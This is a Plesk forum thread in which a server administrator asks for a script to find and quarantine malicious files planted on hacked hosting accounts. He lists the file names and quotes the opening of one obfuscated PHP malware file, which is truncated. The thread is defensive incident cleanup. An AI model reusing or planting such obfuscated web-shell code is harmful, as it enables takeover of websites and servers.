• Our team is looking to connect with folks who use email services provided by Plesk, or a premium service. If you'd like to be part of the discovery process and share your experiences, we invite you to complete this short screening survey. If your responses match the persona we are looking for, you'll receive a link to schedule a call at your convenience. We look forward to hearing from you!
  • The BIND DNS server has already been deprecated and removed from Plesk for Windows.
    If a Plesk for Windows server is still using BIND, the upgrade to Plesk Obsidian 18.0.70 will be unavailable until the administrator switches the DNS server to Microsoft DNS. We strongly recommend transitioning to Microsoft DNS within the next 6 weeks, before the Plesk 18.0.70 release.
  • The Horde component is removed from Plesk Installer. We recommend switching to another webmail software supported in Plesk.

Store fronts attached to legit domains :: Script to Read one Domains File after another

KrazyBob

KrazyBob

Regular Pleskian
I am looking for a bash script (or perl) that will locate the existence of certain files known to be hacks, like 1.x.txt and syslib.php, create a directory and then move these files into that directory. These are files that have been placed on the Plesk 8, 9 and 11 servers to basically take over an existing domain. One file, at.html, is actually and index file when called. All domains have a Store directory even though none was installed by the client. One variation is the creation of a sub directory called Temp in each hacked site. Our backups unfortunately grabbed the compromised sites and we want to delete the files and directories known to actually be scripts or contain harmful scripts. I don't know bash.

Can you help? I'm sure it will help others.
 
Here is an example of some of the files planted. Note the misspelling of versins.php.

Code: 
[root@server101 hack]# ls -ltu
total 508
----------  1 stephen psacln      0 May 31 01:40 index.php
----------  1 stephen psacln  90374 May 29 23:29 12345.php
----------  1 stephen psacln  12346 May 21 08:52 gtdeiz.php
----------  1 stephen psacln  11481 May  7 08:58 dxdfkcqe.php
----------  1 stephen psacln  12947 May  6 05:24 syslib.php
----------  1 stephen psacln 147273 May  5 01:16 versins.php
----------  1 stephen psacln  22543 Apr 28 03:40 right_column.php
----------  1 stephen psacln  11359 Apr 24 09:25 cvifhl.php
----------  1 stephen psacln  11359 Apr 24 09:25 vmjilwam.php
----------  1 stephen psacln  10319 Apr 24 05:40 eogevmgju.php
----------  1 stephen psacln  10319 Apr 24 05:40 vuwvqot.php
----------  1 stephen psacln 147273 Apr  7 01:00 version.php

Almost all contain encrypted code:

Code: 
<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['ea35b4951'] = "\x43\x6c\x38\x50\x53\x6a\x22\x48\x69\x40\x2c\x65\x24\x60\x49\x55\x27\x5e\x5a\x6b\x35\x4c\x5f\x6e\x32\x79\xd\x3d\x41\x28\x72\x71\x67\x73\x78\x4f\x46\x23\x9\x37\x62\xa\x2d\x63\x34\x61\x54\x56\x75\x7b\x74\x44\x36\x64\x57\x4d\x52\x21\x5b\x68\x3e\x4a\x42\x2b\x7a\x30\x66\x76\x29\x47\x26\x39\x3b\x2e\x6f\x2f\x7c\x6d\x25\x31\x51\x70\x58\x4b\x5c\x3f\x3c\x4e\x7e\x5d\x77\x7d\x2a\x3a\x45\x20\x59\x33";
$GLOBALS[$GLOBALS
 
You must log in or register to reply here.

Similar threads

V
Google PageSpeed Insights – How to optimize your site to rank higher
Replies
1
Views
5K
Andrew Roy
Andrew Roy
C
open_basedir restriction in effect but file is in the correct dir
Replies
3
Views
3K
chris.dempsey
C
P
How To: Full Automation for your Slave DNS zone file
Replies
3
Views
7K
Superkikim
S
V
comment on a problem with not the changeable fcgiext.ini
Replies
0
Views
15K
Vasiliy J
V
B
CGI-BIN scripts not executing.
Replies
1
Views
11K
Brian Clarke
B
Back
Top